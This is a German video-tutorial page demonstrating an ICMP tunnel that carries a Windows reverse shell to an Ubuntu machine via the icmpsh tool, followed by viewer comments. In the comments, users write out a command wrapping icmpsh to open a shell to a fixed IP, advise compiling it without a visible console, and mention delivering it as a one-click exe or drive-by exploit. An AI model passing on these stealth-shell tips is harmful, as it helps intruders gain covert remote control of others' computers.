ICMP-Tunnel (Demo)

In diesem VideoTutorial wird anhand einer Demosoftware ein sog. ICMP-Tunnel gezeigt, der eine sog. Reverse-Shell eines Windows-Rechners auf einem Ubuntu-Rechner erscheinen läßt.

Link: https://github.com/inquisb/icmpsh

SemperVideo.de

SemperVideo.de

Auf unserer Website finden Sie viele Informationen, die “Bad Guys” negativ einsetzen könnten. “Good Guys” können sich mit diesen Informationen besser schützen. Die wichtige Frage ist also, ob die “Good Guys” sicherer sind, wenn wir diese Informationen nicht verbreiten.
Loading+ Video in die Merkliste



    • Kommentare zum Video

      avatar
      5000
        Subscribe  
      neuste älteste beste Bewertung
      Benachrichtigung
      CCiTTv5
      Zuschauer

      Nett ;) Auf den letzten CCCamp hatten wir eine kleinen Wettbewerb bei dem
      sogar ein ganzen Chatprogramm über einen ICMP Tunnel programmiert wurde ;)

      LeChasseurBG
      Zuschauer

      Ich Frage mich, ob ich als “User/Angreifer” Ubuntu brauche, oder ob das
      auch mit nur 2 Windows PCs geht. Im Prinzip kann man das ja auch nutzen, um
      Internetsperren von zB der Schule oder anderen Diktatoren zu umgehen :D

      Yong Yung
      Zuschauer

      @How2Online Die parameter für “system” sind kein C++-Standard, aber das ist
      ne andere Geschichte :D (Zudem ist “system” auch eher C als C++ ;)) Nein,
      man nimmt einfach den Quellcode von genau diesem Programm (oder schreibt
      etwas gleichwertiges selbst), nur dass man die IP etc. direkt festlegt.
      Fertig ;) Damit sich die Konsole nicht öffnet muss man dem Compiler
      natürlich noch sagen, dass er das Programm als GUI Applikation kompilieren
      soll. Ist mit etwas Ahnung eigentlich alles recht simpel..

      How2Online
      Zuschauer

      @SemperVideo @SemperVideo das jeißt in C++ einfach n Programm schreiben wie
      z.B. system(“icmpsh.exe -t 192.168.1.111 -b 30 -s 128”) naja, okay. das mit
      dem -b 30 is abweichend… aber in der art würde das klappen, oder? :D

      SemperVideo
      Zuschauer

      @How2Online Das hier ist nur eine Demo der einzelnen Schritte. Das alles
      bei einem Angriff “ordentlich” verpackt würde als One-Klick-Exe daher
      kommen. Evtl. via Exploit einer anderen Schwachstelle auch nur mit aufrufen
      einer Website, dann braucht man nichtmal einen Klick.

      Egliracing1
      Zuschauer

      6 Tage noch,wollt ihr euch nicht mal Windows 7 kaufen ? xD.

      SemperVideo
      Zuschauer

      @MrGtaCrash Kein Problem, ich habs mir in den Kalender geschrieben.

      MrGtaCrash
      Zuschauer

      @SemperVideo Könnten sie in ungefähr 2 Wochen ein Video machen wie sie die
      Datei nocheinmal auf Virustotal hochladen? Würde mich sehr freuen^^

      unrealzocker
      Zuschauer

      @MeBeBonkers wir reden hier aber über icmp nicht tcp.

      MeBeBonkers
      Zuschauer

      @unrealzocker In beiden Fällen erhälst du ein TCP-RST zurück. Siehe
      Wikipedia -> TCP.